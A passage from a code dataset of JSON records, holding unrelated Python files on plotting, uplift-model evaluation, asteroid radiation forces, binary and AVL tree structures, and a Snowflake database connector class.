values2rgbas(myvalues, mycmap, vmin, vmax, center):\n if center == 0:\n # Normalize data before giving colors, because map interval is [0,1] by matplotlib\n # https://stackoverflow.com/questions/25408393/getting-individual-colors-from-a-color-map-in-matplotlib\n norm = Normalize(vmin=vmin, vmax=vmax)\n rgba_tuples = mycmap(norm(myvalues))\n return rgba_tuples\n else :\n print(\"only center == 0 is handled here\")\n\n\ndef inner_pie_colors(inner_dico, mycmap, gabs, mabs):\n metaboval = inner_dico['metabo_sum_val']\n geneval = inner_dico['gene_sum_val']\n metabocolors_ = rgbas2hex(values2rgbas([metaboval], mycmap, -mabs, mabs, center=0))\n genecolors_ = rgbas2hex(values2rgbas([geneval], mycmap, -gabs, gabs, center=0))\n return {'metab_color' : metabocolors_[0], 'gene_color': genecolors_[0]}\n\n\nDEG_full['mycolors'] = rgbas2hex(values2rgbas(DEG_full['log2FC'].to_numpy(), mycmap, -gabs, gabs, center=0))\nDAM_full['mycolors'] = rgbas2hex(values2rgbas(DAM_full['log2FC'].to_numpy(), mycmap, -mabs, mabs, center=0))\n\n\nDAM_full['much'] = 50/(DAM_full.shape[0])\nDEG_full['much'] = 50/(DEG_full.shape[0])\ngathered = pd.concat([DAM_full,DEG_full], axis = 0)\n\ngathered['typemol'] = pd.Categorical(gathered['typemol'], categories = ['metabolite', 'gene'])\ngathered = gathered.sort_values(by='typemol')\n\nlog2FCstrli = [str(i) for i in gathered[\"log2FC\"]]\ngathered[\"blah\"] = gathered[\"name\"].str.cat(log2FCstrli, sep = \": \")\n\n\nprint(\"preparation ok\")\n# also see :https://proplot.readthedocs.io/en/latest/why.html\n\n\n###################################### complicated grid\n# PLOT GRID :\n# as many columns as comparisons,\n# as many rows as paths + add supplementary row(s) for bars\nnbpaths = len(pathdico)\n\nnbcompars = len(comparisondico) # this has to be deduced from tables files\n\ntf = True\n\nif nbcompars == 1:\n supplerows = 2\nelse:\n supplerows = 1\n\n\nif dimensions_pdf is None:\n dimensions_pdf = tuple(nbpaths*7, supplerows*9)\nsns.set_style({'font.family' : 'serif', 'font.serif':['Meiryo']})\nfig, axes = plt.subplots(nrows = nbpaths + supplerows,\n ncols = nbcompars, figsize=dimensions_pdf)\nfig.subplots_adjust(bottom=0, top=0.9, left=0, right=1,\n wspace=0.2, hspace=0.4)\n# prepare subsetters as indexesdico for axes.flat usage\nindexesdico = dict()\nindexer = 0\nfor i in pathdico.keys():\n for j in comparisondico.keys():\n indexesdico[indexer] = {'path': i, 'comparison': j}\n indexer += 1\nindexer = 0\nfor ax in axes.flat[:len(indexesdico)]:\n print(indexer)\n ax = axes.flat[indexer]\n path_elems_here = pathdico[ indexesdico[indexer]['path'] ]\n gatheredsub = gathered.loc[gathered['name'].isin(path_elems_here),: ]\n compari_here = indexesdico[indexer]['comparison']\n ax.set_title(f\"{indexesdico[indexer]['path'] }\\n {compari_here}\\n\")\n gatheredsub = gatheredsub.loc[gatheredsub['comparison'] == compari_here,: ]\n print(gatheredsub)\n\n ##################\n # donut\n ##################\n log2FC = gatheredsub[\"log2FC\"]\n sizefoo = gatheredsub[\"much\"]\n annots = gatheredsub[\"blah\"]\n mappedcolorshaha = gatheredsub[\"mycolors\"]\n\n if tf == False:\n ax.pie(sizefoo,\n colors=mappedcolorshaha,\n wedgeprops={'width': 1, 'edgecolor': 'black', 'linewidth': 0.8},\n radius=1,\n startangle=90)\n else: # add metabolites to the plot\n ax.pie(sizefoo,\n colors=mappedcolorshaha,\n wedgeprops={'width': 1, 'edgecolor': 'black', 'linewidth': 0.8},\n radius=1,\n startangle=90,\n\n labels=annots, ## this one yiels the labels annotated in the plot\n textprops={'fontsize': 12}\n )\n ## white circles for artist patches\n my_circle2 = plt.Circle((0, 0), radius=0.47, edgecolor=\"black\", linewidth=1.6)\n my_circle = plt.Circle((0, 0), radius=0.465, color=\"white\")\n ax.add_patch(my_circle2)\n ax.add_patch(my_circle)\n inner_dico = { 'metabo_sum_val' : gatheredsub.loc[gatheredsub.typemol == 'metabolite', 'log2FC'].sum(),\n 'gene_sum_val' : gatheredsub.loc[gatheredsub.typemol == 'gene', 'log2FC'].sum() }\n inner_colorsD = inner_pie_colors(inner_dico, mycmap, gabs, mabs)\n innerlabelsorder = [ inner_colorsD['metab_color'], inner_colorsD['gene_color'] ]\n print(inner_dico)\n # internal pie\n ax.pie([50, 50],\n colors=[ inner_colorsD['metab_color'], inner_colorsD['gene_color'] ],\n wedgeprops={'width': 0.41, 'edgecolor': 'black', 'linewidth': 0.7},\n radius=0.41,\n startangle=90,\n labels = np.array([inner_dico['metabo_sum_val'], inner_dico['gene_sum_val']]).round(1),\n labeldistance = 0.2)\n ax.axis('equal')\n ax.legend('', frameon=False) # https://www.statology.org/remove-legend-matplotlib/\n # ax.tight_layout()\n # ####\n # end donut\n ###\n indexer += 1\n# end for\n\n# fill last two panels with color bar key\n\n\n# do \"fake\" separated heatmaps to take the colorbar key separately for metabolites and for genes\nsns.heatmap([[]], ax=axes.flat[-2], cmap=mycmap, center=0, cbar=True,\n annot=False,\n square=True,\n vmin=-mabs, vmax=mabs, cbar_kws={'shrink': 0.9, 'aspect': 10,\n 'label': 'metabolite',\n 'drawedges': False})\n# axes.flat[-2].text(-0.3, 0.7, \"metabolite\", rotation=90)\n\nsns.heatmap([[]], ax=axes.flat[-1], cmap=mycmap, center=0, cbar=True,\n annot=False,\n square=True,\n vmin=-gabs, vmax=gabs, cbar_kws={'shrink': 0.9, 'aspect': 10,\n 'label': 'gene',\n 'drawedges': False})\n# axes.flat[-1].text(-0.3, 0.7, \"gene\", rotation=90)\n\nplt.savefig(\"MYDONUTS.pdf\")\n\n# thanks also to:\n#https://stackoverflow.com/questions/49199164/increasing-pie-chart-size-with-matplotlib-radius-parameter-appears-to-do-nothin\n","repo_name":"johaGL/rough_code","sub_path":"recyclebin_dimet/drafts_dimet/draft_metabologram.py","file_name":"draft_metabologram.py","file_ext":"py","file_size_in_byte":8663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21706636268","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import rankdata, kendalltau\n\n\ndef qini_curve(treat, outcome, uplift_prob_, p_precision=2, plotit=True, name=\"\"):\n \"\"\"\n Returns a qini curve table using final predicted uplifts from the model\n and the associated qini coefficient\n\n Parameters:\n :param treat - Traetment group for each sample (Whether the sample is in Test/Conrol group)\n :param outcome - Outcome for the given sample (Sale happened or not)\n :param uplift_prob_ - Predicted uplift probabilities by the model for sorting the customers/samples\n :param p_precision - Precision for ranking quantiles (if 1 it rounds the quantiles to the first decimal and\n generates Qini for deciles, if 2 it rounds the quantiles to the second decimal and\n generates Qini for percentiles, and so on...)\n :param plotit - Plot the Qini curve\n \"\"\"\n\n # Create a dataframe for the input variables\n outcome = np.array(outcome).reshape(-1,1)\n treat = np.array(treat).reshape(-1,1)\n uplift_prob_ = np.array(uplift_prob_).reshape(-1,1)\n d = np.concatenate((outcome, treat, uplift_prob_), axis=1)\n df = pd.DataFrame(d, columns=['outcome', 'treat', 'pred_uplift'])\n df = df.sort_values(by='pred_uplift', ascending=False).reset_index(drop=True)\n\n # Sorting and ranking the samples/customers using the predicted uplifts\n df['rank'] = np.round(rankdata(-df['pred_uplift'], method='max') / df.values.shape[0], p_precision)\n\n # Building cummulative sales and actual uplifts for input data for each of the groups\n no_of_groups = np.unique(df['rank'])\n no_of_groups = no_of_groups[no_of_groups > 0]\n qini_table = np.zeros((len(no_of_groups), 7))\n for i in range(len(no_of_groups)):\n subset = df.loc[df['rank'] <= no_of_groups[i]]\n qini_table[i, 0] = no_of_groups[i]\n qini_table[i, 1] = subset.loc[subset['treat'] == 1].loc[subset['outcome'] == 1].shape[0] # sales_in_Test\n qini_table[i, 2] = subset.loc[subset['treat'] == 1].shape[0]\n qini_table[i, 3] = subset.loc[subset['treat'] == 0].loc[subset['outcome'] == 1].shape[0] # sales_in_control\n qini_table[i, 4] = subset.loc[subset['treat'] == 0].shape[0]\n\n # Actual Uplift using the Normalized sales values for control & test groups\n qini_table[i, 5] = qini_table[i, 1] - qini_table[i, 3] * qini_table[i, 2] / qini_table[i, 4]\n\n # Cummulative acutal uplifts calculated\n qini_table[:, 6] = qini_table[:, 5] / qini_table[len(no_of_groups) - 1, 2] * 100\n\n # Uplift values from the model for plotting Qini\n x_axis = np.concatenate((np.zeros(1), qini_table[:, 0]))\n y_axis = np.concatenate((np.zeros(1), qini_table[:, 6]))\n\n # Uplift values by random targeting\n x_rand = np.array((0, 1))\n y_rand = np.array((0, qini_table[len(no_of_groups) - 1, 6]))\n\n # Build dataframe for the Decile table\n qini_table_to_return = pd.DataFrame(qini_table)\n qini_table_to_return.columns = ['%_of_list', 'Sales_in_Test', 'Obs_in_Test', 'Sales_in_Control', 'Obs_in_Control',\n 'Norm_Cum_Uplift', 'Cum_Uplift(%)']\n\n # Compute the Qini coefficient\n nb = len(qini_table_to_return)\n qini_coeff = qini_table_to_return.values[0, 6] / 2 * qini_table_to_return.values[0, 2] / \\\n qini_table_to_return.values[nb - 1, 2]\n for i in range(1, nb):\n qini_coeff += (qini_table_to_return.values[i, 6] + qini_table_to_return.values[i - 1, 6]) / 2 * (\n qini_table_to_return.values[i, 2] / qini_table_to_return.values[nb - 1, 2] -\n qini_table_to_return.values[i - 1, 2] / qini_table_to_return.values[nb - 1, 2])\n\n qini_coeff -= qini_table_to_return.values[nb - 1, 6] / 2\n\n if plotit:\n # plot the qini curve\n plt.title('Qini Curve')\n plt.xlabel('Proportion of Treated Observations')\n plt.ylabel('Incremental Positive Outcomes (%)')\n plt.plot(x_axis, y_axis, '--r', label='Uplift Model')\n plt.plot(x_rand, y_rand, '--b', label='Random')\n plt.legend(loc='lower center', bbox_to_anchor=(1.4, 0.0), shadow=True, ncol=1)\n if name != \"\":\n plt.savefig(name)\n plt.show(block=True)\n\n return qini_table_to_return, qini_coeff\n\n\ndef qini_barplot(treat, outcome, uplift_prob_, p_precision=1, plotit=True):\n \"\"\"\n Returns a barplot table using final predicted uplifts from the model\n and the associated uplift kendall's correlation\n\n Parameters:\n :param treat - Traetment group for each sample (Whether the sample is in Test/Conrol group)\n :param outcome - Outcome for the given sample (Sale happened or not)\n :param uplift_prob_ - Predicted uplift probabilities by the model for sorting the customers/samples\n :param p_precision - Precision for ranking quantiles (if 1 it rounds the quantiles to the first decimal and\n generates barplot for deciles, if 2 it rounds the quantiles to the second decimal and\n generates barplot for percentiles, and so on...)\n \"\"\"\n\n # Create a dataframe for the input variables\n outcome = np.array(outcome).reshape(-1, 1)\n treat = np.array(treat).reshape(-1, 1)\n uplift_prob_ = np.array(uplift_prob_).reshape(-1, 1)\n d = np.concatenate((outcome, treat, uplift_prob_), axis=1)\n df = pd.DataFrame(d, columns=['outcome', 'treat', 'pred_uplift'])\n df = df.sort_values(by='pred_uplift', ascending=False).reset_index(drop=True)\n\n # Sorting and ranking the samples/customers using the predicted uplifts\n df['rank'] = np.round(rankdata(-df['pred_uplift'], method='max') / df.values.shape[0], p_precision)\n\n # Build BarPlot\n no_of_groups = np.unique(df['rank'])\n no_of_groups = no_of_groups[no_of_groups > 0]\n table = np.zeros((len(no_of_groups), 12))\n for i in range(len(no_of_groups)):\n if i == 0:\n subset = df.loc[df['rank'] <= no_of_groups[i]]\n else:\n subset = df.loc[(no_of_groups[i - 1] < df['rank']) & (df['rank'] <= no_of_groups[i])]\n table[i, 0] = no_of_groups[i] * 100\n table[i, 1] = subset.loc[subset['treat'] == 1].loc[subset['outcome'] == 1].shape[0]\n table[i, 2] = subset.loc[subset['treat'] == 1].shape[0]\n table[i, 3] = subset.loc[subset['treat'] == 0].loc[subset['outcome'] == 1].shape[0]\n table[i, 4] = subset.loc[subset['treat'] == 0].shape[0]\n table[i, 5] = \"{0:.4f}\".format(subset['pred_uplift'].mean())\n table[i, 6] = table[i, 1] / table[i, 2] * 100\n table[i, 7] = table[i, 3] / table[i, 4] * 100\n table[i, 8] = table[i, 6] - table[i, 7]\n table[i, 9] = \"{0:.4f}\".format(subset['pred_uplift'].min()) # min uplift in that particular bin\n table[i, 10] = \"{0:.4f}\".format(subset['pred_uplift'].max()) # max uplift in that particular bin\n table[i, 11] = (table[i, 1] + table[i, 3]) * 100 / df.outcome.sum() # %sales captured in that bin\n\n # Build dataframe for the Decile table\n table_to_return = pd.DataFrame(table)\n table_to_return.columns = ['%_of_list', 'Sales_in_Test', 'Obs_in_Test', 'Sales_in_Control', 'Obs_in_Control',\n 'avg_pred_uplift', 'sale%_in_Test', 'sale%_in_Control', 'observed_uplift(%)',\n 'min_pred_uplift', 'max_pred_uplift', '%sales_captured']\n\n # Compute Kendall's rank correlation\n observed_uplift_rank = rankdata(-table_to_return['observed_uplift(%)'], method='average')\n predicted_uplift_rank = np.array(range(1, len(table_to_return) + 1))\n uplift_kendalltau = np.round(kendalltau(observed_uplift_rank, predicted_uplift_rank)[0], 2)\n uplift_risk = np.mean((observed_uplift_rank - predicted_uplift_rank)**2)\n\n if plotit:\n # Create bars\n plt.bar(np.arange(len(table_to_return)), table_to_return['observed_uplift(%)'])\n # Create names on the x-axis\n plt.xticks(np.arange(len(table_to_return)), table_to_return['%_of_list'])\n plt.title('Uplift Barplot')\n plt.xlabel('Proportion or Targeted Individuals')\n plt.ylabel('Policy Sales (%)')\n # Show graphic\n plt.show(block=True)\n\n return uplift_risk, uplift_kendalltau\n","repo_name":"belbahrim/twin-causal-net","sub_path":"src/twincausal/utils/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31358412671","text":"'''\nFile housing the Asteroid class, a subclass of AMUSE Particle with added functionality.\nCalculates its own YORP and Yarkovsky forces in the System.\n\n@author: nazli\n'''\n\nimport numpy as np\nfrom amuse.lab import Particle\nfrom amuse.lab import constants\nfrom amuse.units import units as u \n\nfrom cube_sphere import Sphere\n\nclass Asteroid(Particle):\n '''\n A subclass of the AMUSE Particle with added functionality for asteroids.\n\n Inputs:\n\n Variables:\n (from amuse.lab.Particle)\n - position : [x, y, z] spatial coordinates of the object.\n\n - tesselations: a list of patches [center, normal, area, temperature, albedo] defining the surface tesselation of the asteroid.\n '''\n def __init__(self, radius, definition = 10, key=None, particles_set=None, set_index=None, set_version=-1, **keyword_arguments):\n super().__init__(key, particles_set, set_index, set_version, **keyword_arguments) \n self.radius = radius\n\n tessellations = Sphere(self.radius.value_in(u.m), definition = definition).get_sphere_areas()\n for face in tessellations:\n face += [0, 0, 0] #To store temperature, albedo, emissivity.\n tessellations = np.array(tessellations, dtype=object)\n\n object.__setattr__(self, \"tessellations\", tessellations)\n \n self.get_albedo_emissivity()\n \n def get_albedo_emissivity(self, albedo_array = None, emissivity_array = None):\n '''\n Either automatically initialize the surface emissivity and albedo, or import them from array.\n\n Inputs:\n - albedo_array: an array of albedo values with same length as the number of tessellations. Manual input or auto-generated.\n - emissivity_array: an array of emissivity values with same length as the number of tessellations. Manual input or auto-generated.\n\n Returns:\n None\n '''\n if not albedo_array: \n self.tessellations[:,4] = np.random.uniform(0,1,len(self.tessellations[:,4]))\n else:\n self.tessellations[:,4] = albedo_array \n if not emissivity_array:\n self.tessellations[:,5] = np.array([0.65]*len(self.tessellations[:,5]))\n else:\n self.tessellations[:,5] = emissivity_array\n\n def get_acceleration(self, star_direction, star):\n '''\n Given the direction to and the star in the system, calculates the Yarkovsky (and YORP) forces on the asteroid through iterating over \n its own tesselated surface and returns the accelerations per spatial coordinate.\n\n Inputs:\n - star_direction: as defined in System.get_directions.\n - star: as defined in System variables.\n \n Returns:\n - acceleration: the total accelerations ax, ay, az on the asteroid.\n '''\n total_force = np.zeros(3) | u.m * u.kg * u.s**-2\n for patch in self.tessellations:\n #Define the variables. Ugly...\n center = patch[0]\n normal = patch[1]\n area = patch[2] | u.m**2\n temperature = None\n albedo = patch[4]\n emissivity = patch[5]\n \n #Calculate off-axis factor. If this number is less than 0, it means the patch is invisible from the star.\n mu_0 = np.dot(star_direction, normal)\n if mu_0 < 0:\n mu_0 = 0\n\n #Calculate incident flux.\n star_dist = np.linalg.norm(star.position-self.position) #norm is magnitude\n incident_flux = star.luminosity / (4*np.pi*star_dist**2)\n\n #Calculate and log the patch temperature.\n temperature = (((1-albedo)*mu_0*incident_flux)/(emissivity*constants.Stefan_hyphen_Boltzmann_constant))**(1/4)\n patch[3] = temperature\n \n #Calculate the scattering force.\n scattering_force = -(2/3) * (mu_0 * albedo * incident_flux / constants.c) * area * normal\n total_force += scattering_force\n\n #Calculate the thermal force.\n thermal_force = -(2/3) * (emissivity * constants.Stefan_hyphen_Boltzmann_constant \\\n * temperature**4 / constants.c) * area * normal\n total_force += thermal_force\n\n #Return accelerations. Account for the the zero point float.\n zero_float = 5.45e-14 | u.m * u.s**-2\n zero = 0 | u.m * u.s**-2\n\n ax = total_force[0]/self.mass if np.abs(total_force[0]/self.mass) > zero_float else zero \n ay = total_force[1]/self.mass if np.abs(total_force[1]/self.mass) > zero_float else zero \n az = total_force[2]/self.mass if np.abs(total_force[2]/self.mass) > zero_float else zero \n\n factor = 1e0 #Debugging tool.\n \n return factor*ax, factor*ay, factor*az\n\n def get_flux(self, obs_direction, star_direction, observer, star):\n '''\n Given the directions and the observer and star in the system, calculates the flux observed by the observer through iterating \n over its own tesselated surface.\n\n Inputs:\n - obs_direction: as defined in System.get_directions.\n - star_direction: as defined in System.get_directions.\n - observer: as defined in System variables.\n - star: as defined in System variables.\n\n Returns:\n - flux: the total flux observed by the observer.\n '''\n\n total_flux = 0 | u.kg * u.s**-3 \n for patch in self.tessellations:\n #Define the variables. Ugly...\n center = patch[0]\n normal = patch[1]\n area = patch[2] | u.m**2\n temperature = None\n albedo = patch[4]\n emissivity = patch[5]\n \n #Calculate off-axis factor. If this number is less than 0, it means the patch is invisible from the star.\n mu_0 = np.dot(star_direction, normal)\n if mu_0 < 0:\n mu_0 = 0 \n\n #Calculate the incident flux.\n star_dist = np.linalg.norm(star.position-self.position)\n incident_flux = star.luminosity / (4*np.pi*star_dist**2)\n\n #Calculate and log the patch temperature.\n temperature = (((1-albedo)*mu_0*incident_flux)/(emissivity*constants.Stefan_hyphen_Boltzmann_constant))**(1/4)\n patch[3] = temperature\n \n #Calculate the received flux due to re-emitted radiation. \n obs_dist = np.linalg.norm(observer.position-self.position)\n re_emitted_flux = constants.Stefan_hyphen_Boltzmann_constant * area * temperature**4 / (2*np.pi*obs_dist**2)\n re_emitted_flux = re_emitted_flux * np.dot(obs_direction, normal)\n total_flux += re_emitted_flux\n \n #Define the reflection reception criterion.\n def reflection_reception(v1, v2, observer):\n observer_size = 1 | u.REarth \n obs_dist = np.linalg.norm(observer.position-self.position)\n angle = np.arctan(observer_size/obs_dist)\n return bool(np.arccos(np.dot(v1, v2)) < angle)\n\n #Calculate the received flux due to reflected radiation.\n incident_obs_flux = (incident_flux*np.pi*self.radius**2) /(4*np.pi*obs_dist**2)\n \n reflected_flux = incident_obs_flux * albedo\n reflected_direction = star_direction - 2*np.dot(star_direction,normal)*normal \n if reflection_reception(obs_direction, reflected_direction, observer):\n total_flux += reflected_flux\n \n return total_flux","repo_name":"clairejol/AMUSE-Asteroids","sub_path":"scripts/asteroid.py","file_name":"asteroid.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9325816944","text":"from typing import Any, Union\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\ndef output(value):\n if not BinaryTree.testing:\n print(value)\n\n\nclass BinaryTree:\n testing = False\n\n def __init__(self, c_root_node, testing=False):\n self.__root = c_root_node\n self.testing = testing\n\n def preorder_traverse(self):\n def preorder(node: Node):\n if not node: return\n _list.append(node.value)\n output(node.value)\n preorder(node.left)\n preorder(node.right)\n\n _list = []\n preorder(self.__root)\n return _list\n\n def preorder_traverse_iter(self):\n _list = []\n node_stack = [self.__root]\n while len(node_stack):\n node = node_stack.pop()\n _list.append(node.value)\n output(node.value)\n if node.right:\n node_stack.append(node.right)\n if node.left:\n node_stack.append(node.left)\n return _list\n\n def inorder_traverse(self) -> list:\n def inorder(node: Node):\n if not node: return\n inorder(node.left)\n _list.append(node.value)\n if not self.testing: print(node.value)\n inorder(node.right)\n\n _list = []\n inorder(self.__root)\n return _list\n\n def inorder_traverse_iter(self):\n \"\"\"\n result_1 = [10, 41, 40, 42, 45, 50, 75]\n :return:\n \"\"\"\n current, stack, done, _list = self.__root, [], False, []\n while not done:\n if current is not None:\n stack.append(current)\n current = current.left\n else:\n if len(stack):\n current = stack.pop()\n _list.append(current.value)\n if not self.testing: print(current.value)\n current = current.right\n else:\n done = True\n return _list\n\n def postorder_traverse(self):\n def postorder(node: Node):\n if node.left:\n postorder(node.left)\n if node.right:\n postorder(node.right)\n print(node.value)\n\n postorder(self.__root)\n\n def postorder_traverse_iter(self):\n s1, s2 = [], []\n s1.append(self.__root)\n while len(s1):\n node = s1.pop()\n s2.append(node)\n if node.left:\n s1.append(node.left)\n if node.right:\n s1.append(node.right)\n while len(s2):\n node = s2.pop()\n print(node.value)\n\n def levelorder_traverse(self):\n root, queue = self.__root, []\n if not root: return\n queue.append(root)\n while len(queue):\n temp = queue.pop(0)\n print(temp.value)\n if temp.left:\n queue.append(temp.left)\n if temp.right:\n queue.append(temp.right)\n # end def\n\n\nclass BinarySearchTree:\n tree: Union[Node, Any]\n\n def __init__(self):\n super().__init__()\n self.__root = None\n\n def insert(self, value):\n this_node = Node(value)\n if not self.__root:\n self.__root = this_node\n else:\n current_root = self.__root\n while True:\n if current_root.value > value:\n if current_root.left is not None:\n current_root = current_root.left\n else:\n current_root.left = this_node\n break\n elif current_root.value < value:\n if current_root.right is not None:\n current_root = current_root.right\n else:\n current_root.right = this_node\n break\n else:\n break # both are the same\n\n # end insert\n\n def remove(self, value: int) -> Node:\n def find_min(root: Node) -> Node:\n while root.left:\n root = root.left\n return root\n\n def delete_recursive(root: Node, c_value: int) -> Union[Node, None]:\n if not root:\n return None\n elif c_value < root.value:\n root.left = delete_recursive(root.left, c_value)\n elif c_value > root.value:\n root.right = delete_recursive(root.right, c_value)\n else:\n if not root.left and not root.right:\n return None\n elif not root.left:\n root = root.right\n return root\n elif not root.right:\n root = root.left\n return root\n else:\n temp = find_min(root.right)\n root.value = temp.value\n root.right = delete_recursive(root.right, c_value)\n return root\n return root\n\n return delete_recursive(self.__root, value)\n\n # end remove\n\n def find_node(self, value: int) -> bool:\n current_root, found = self.__root, False\n while current_root:\n if value < current_root.value:\n current_root = current_root.left\n elif value > current_root.value:\n current_root = current_root.right\n else: # we found a match\n found = True\n break\n return found\n\n def get_structure(self):\n return self.__root\n\n\n# noinspection PyUnresolvedReferences\nclass AVL_Tree:\n #left: int\n\n def __init__(self, value):\n #super().__init__()\n self.left = None\n self.right = None\n self.value = value\n self.depth = 1\n\n def __set_depth_based_on_children(self):\n if self.depth is None: # self.value ?\n self.depth = 1\n\n if self.left is not None:\n self.depth = self.left.depth + 1\n\n if self.right is not None and self.depth <= self.right.depth:\n self.depth = self.right.depth + 1\n\n def __rotateLL(self):\n value_before = self.value\n right_before = self.right\n self.value = self.left.value\n\n self.right = self.left\n self.left = self.left.left\n self.right.left = self.right.right\n self.right.right = right_before\n self.right.value = value_before\n\n self.right.get_depth_from_children()\n self.__set_depth_based_on_children()\n\n def __rotateRR(self):\n value_before, left_before = self.value, self.left\n self.value = self.right.value\n\n self.left = self.right\n self.right = self.right.right\n self.left.right = self.left.left\n self.left.left = left_before\n self.left.value = value_before\n\n self.left.__set_depth_based_on_children()\n self.__set_depth_based_on_children()\n\n def __balance(self):\n l_depth = 0 if self.left is None else self.left.depth\n r_depth = 0 if self.right is None else self.right.depth\n if l_depth > r_depth + 1:\n ll_depth = 0 if self.left.left is None else self.left.left.depth\n lr_depth = 0 if self.left.right is None else self.left.right.depth\n\n if ll_depth < lr_depth:\n self.left.rotateRR()\n self.__rotateLL()\n elif l_depth + 1 < r_depth:\n rr_depth = 0 if self.right.right is None else self.right.right.depth\n rl_depth = 0 if self.right.left is None else self.right.left.depth\n if rr_depth < rl_depth:\n self.right.rotateLL()\n self.__rotateRR()\n\n def insert(self, value) -> bool:\n child_inserted = False\n if value == self.value:\n return False\n elif value < self.value:\n if self.left is None:\n self.left = AVL_Tree(value)\n child_inserted = True\n else:\n # recursive call\n child_inserted = self.left.insert(value)\n if child_inserted:\n self.__balance()\n elif value > self.value:\n if self.right is None:\n self.right = AVL_Tree(value)\n child_inserted = True\n else:\n # recursive call\n child_inserted = self.right.insert(value)\n if child_inserted:\n self.__balance()\n if child_inserted:\n self.__set_depth_based_on_children()\n return child_inserted\n\n def remove(self, value):\n def find_min(root):\n while root.left: root = root.left\n return root\n\n def delete_recursive(root, c_value):\n if not root:\n return None\n elif value < c_value:\n root.left = delete_recursive(root.left, value)\n elif value > c_value:\n root.right = delete_recursive(root.right, value)\n else: # no children\n if not root.left and not root.right:\n return None # case 1\n elif not root.left:\n root = root.right\n return root\n elif not root.left:\n root = root.right\n return root\n else:\n temp = find_min(root.right)\n root.value = temp.value\n root.right = delete_recursive(root.right, temp.value)\n return root\n root.__set_depth_based_on_children()\n return root\n\n return delete_recursive(self, value)\n\n\n# ~ Utilility Functions ~ #\ndef construct_binary_tree() -> Node:\n root = Node(42)\n\n root.left = Node(41)\n root.right = Node(50)\n\n root.left.left = Node(10)\n root.left.right = Node(40)\n\n root.right.left = Node(45)\n root.right.right = Node(75)\n\n return root\n\n\ndef construct_binary_search_tree() -> BinarySearchTree:\n _list = [42, 41, 10, 40, 50, 45, 75]\n bst = BinarySearchTree()\n for i in _list:\n bst.insert(i)\n return bst\n\n\ndef construct_avl_tree():\n avl = AVL_Tree(1)\n a_set = [2, 3, 4, 5, 123, 203, 2222]\n for i in a_set:\n avl.insert(i)\n print(avl)\n br = 1\n\n\nconstruct_avl_tree()\n\n\ndef run_binary_tree():\n binary_search_tree = construct_binary_search_tree()\n find20 = binary_search_tree.find_node(20)\n find42 = binary_search_tree.find_node(42)\n\n root_node = construct_binary_tree()\n binary_tree = BinaryTree(root_node)\n\n # print('preorder traverse: ')\n t1 = binary_tree.preorder_traverse()\n\n # print('\\npreorder traverse iterative: ')\n t2 = binary_tree.preorder_traverse_iter()\n\n br = 1\n\n# end of file\n","repo_name":"ideaguy3d/algos","sub_path":"@_Trees/tree2.py","file_name":"tree2.py","file_ext":"py","file_size_in_byte":10854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"444749745","text":"import os\nfrom pathlib import PurePath\n\nfrom .database import Database\nfrom .errors import DBError, S3CredentialsError\nfrom .logger import INFO, get_logger\nfrom .s3 import S3\nfrom .utility import find_column_type\n\nlogger = get_logger(__name__, INFO)\n\nCOPY_FORMAT_OPTIONS = {\n \"csv\": {\n \"compression\",\n \"record_delimiter\",\n \"field_delimiter\",\n \"skip_header\",\n \"date_format\",\n \"time_format\",\n \"timestamp_format\",\n \"binary_format\",\n \"escape\",\n \"escape_unenclosed_field\",\n \"trim_space\",\n \"field_optionally_enclosed_by\",\n \"null_if\",\n \"error_on_column_count_mismatch\",\n \"validate_utf8\",\n \"empty_field_as_null\",\n \"skip_byte_order_mark\",\n \"encoding\",\n },\n \"json\": {\n \"compression\",\n \"file_extension\",\n \"enable_octal\",\n \"allow_duplicate\",\n \"strip_outer_array\",\n \"strip_null_values\",\n \"ignore_utf8_errors\",\n \"skip_byte_order_mark\",\n },\n \"parquet\": {\"binary_as_text\"},\n}\n\n\nUNLOAD_FORMAT_OPTIONS = {\n \"csv\": {\n \"compression\",\n \"record_delimiter\",\n \"field_delimiter\",\n \"file_extension\",\n \"date_format\",\n \"time_format\",\n \"timestamp_format\",\n \"binary_format\",\n \"escape\",\n \"escape_unenclosed_field\",\n \"field_optionally_enclosed_by\",\n \"null_if\",\n },\n \"json\": {\"compression\", \"file_extension\"},\n \"parquet\": {\"snappy_compression\"},\n}\n\n\ndef combine_options(options=None):\n \"\"\"Returns the ``copy_options`` or ``format_options`` attribute with spaces in between and as\n a string. If options is ``None`` then return an empty string.\n\n Parameters\n ----------\n options : list, optional\n list of strings which is to be converted into a single string with spaces\n inbetween. Defaults to ``None``\n\n Returns\n -------\n str:\n ``options`` attribute with spaces in between\n \"\"\"\n return \" \".join(options) if options is not None else \"\"\n\n\nclass Snowflake(S3, Database):\n \"\"\"Locopy class which manages connections to Snowflake. Inherits ``Database`` and implements\n the specific ``COPY INTO`` functionality.\n\n Parameters\n ----------\n profile : str, optional\n The name of the AWS profile to use which is typically stored in the\n ``credentials`` file. You can also set environment variable\n ``AWS_DEFAULT_PROFILE`` which would be used instead.\n\n kms_key : str, optional\n The KMS key to use for encryption\n If kms_key Defaults to ``None`` then the AES256 ServerSideEncryption\n will be used.\n\n dbapi : DBAPI 2 module, optional\n A database adapter which is Python DB API 2.0 compliant (``snowflake.connector``)\n\n config_yaml : str, optional\n String representing the YAML file location of the database connection keyword arguments. It\n is worth noting that this should only contain valid arguments for the database connector you\n plan on using. It will throw an exception if something is passed through which isn't valid.\n\n **kwargs\n Database connection keyword arguments.\n\n Attributes\n ----------\n profile : str\n String representing the AWS profile for authentication\n\n kms_key : str\n String representing the s3 kms key\n\n session : boto3.Session\n Hold the AWS session credentials / info\n\n s3 : botocore.client.S3\n Hold the S3 client object which is used to upload/delete files to S3\n\n dbapi : DBAPI 2 module\n database adapter which is Python DBAPI 2.0 compliant (snowflake.connector)\n\n connection : dict\n Dictionary of database connection items\n\n conn : dbapi.connection\n DBAPI 